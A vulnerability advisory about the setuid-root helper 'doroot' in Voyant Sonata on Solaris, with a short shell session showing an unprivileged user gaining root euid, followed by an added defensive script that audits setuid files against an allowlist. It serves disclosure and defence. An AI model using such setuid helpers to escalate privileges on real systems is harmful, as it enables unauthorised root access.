Vulnerability
doroot (Sonata)
Affected
Voyant Technologies Sonata v3.x on Solaris 2.x.
Description
Larry W. Cashdollar found the following. The setuid binary doroot
does exactly what its name says: it executes its command-line
argument as root. This is really silly.
$ cd /opt/TK/tk4.1/library/demos
$ id
uid=60001(nobody) gid=60001(nobody)
$ ./doroot id
uid=60001(nobody) gid=60001(nobody) euid=0(root)
$ ls -l doroot
-rwsr-xr-x 1 root other 6224 Mar 12 1999 doroot
Solution
The vendor has stated that the security of the conferencing system
is up to the customer. This makes it pretty difficult to apply
modifications to many systems, since they are in production and
cannot have any downtime.
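Since the vendor leaves this to the customer, one way to catch binaries
like doroot is to inventory setuid-root files and compare them against a
reviewed allowlist. The script below is an added example, not part of the
original advisory or of Sonata; the function names, the allowlist file
and its one-path-per-line format are assumptions.

```shell
#!/bin/sh
# Added example: inventory setuid files and report the ones nobody approved.
# The default owner (root) and the allowlist format are assumptions.

# list_setuid DIR [OWNER]
# Print every regular file under DIR that has the setuid bit set and is
# owned by OWNER (default: root), one path per line, sorted.
list_setuid() {
    dir=$1
    owner=${2:-root}
    find "$dir" -type f -user "$owner" -perm -4000 -print 2>/dev/null | sort
}

# unapproved_setuid DIR ALLOWLIST [OWNER]
# Print the setuid files under DIR that are not named in ALLOWLIST.
# ALLOWLIST holds one reviewed path per line, written the way find prints it.
unapproved_setuid() {
    dir=$1
    allow=$2
    owner=${3:-root}
    list_setuid "$dir" "$owner" | while IFS= read -r path; do
        # -x whole-line, -F fixed string: "/bin/su" never approves "/bin/sudo".
        if ! grep -qxF -- "$path" "$allow" 2>/dev/null; then
            printf '%s\n' "$path"
        fi
    done
}

# When run as a script with arguments, e.g.
#   sh audit.sh /opt /etc/setuid.allow
# report the unapproved setuid-root files under the given directory.
if [ "$#" -ge 2 ]; then
    unapproved_setuid "$@"
fi
```

Removing the bit with chmod u-s stops the escalation shown above. Whether
Sonata depends on doroot being setuid is not stated in the advisory, so
check that before changing a production system.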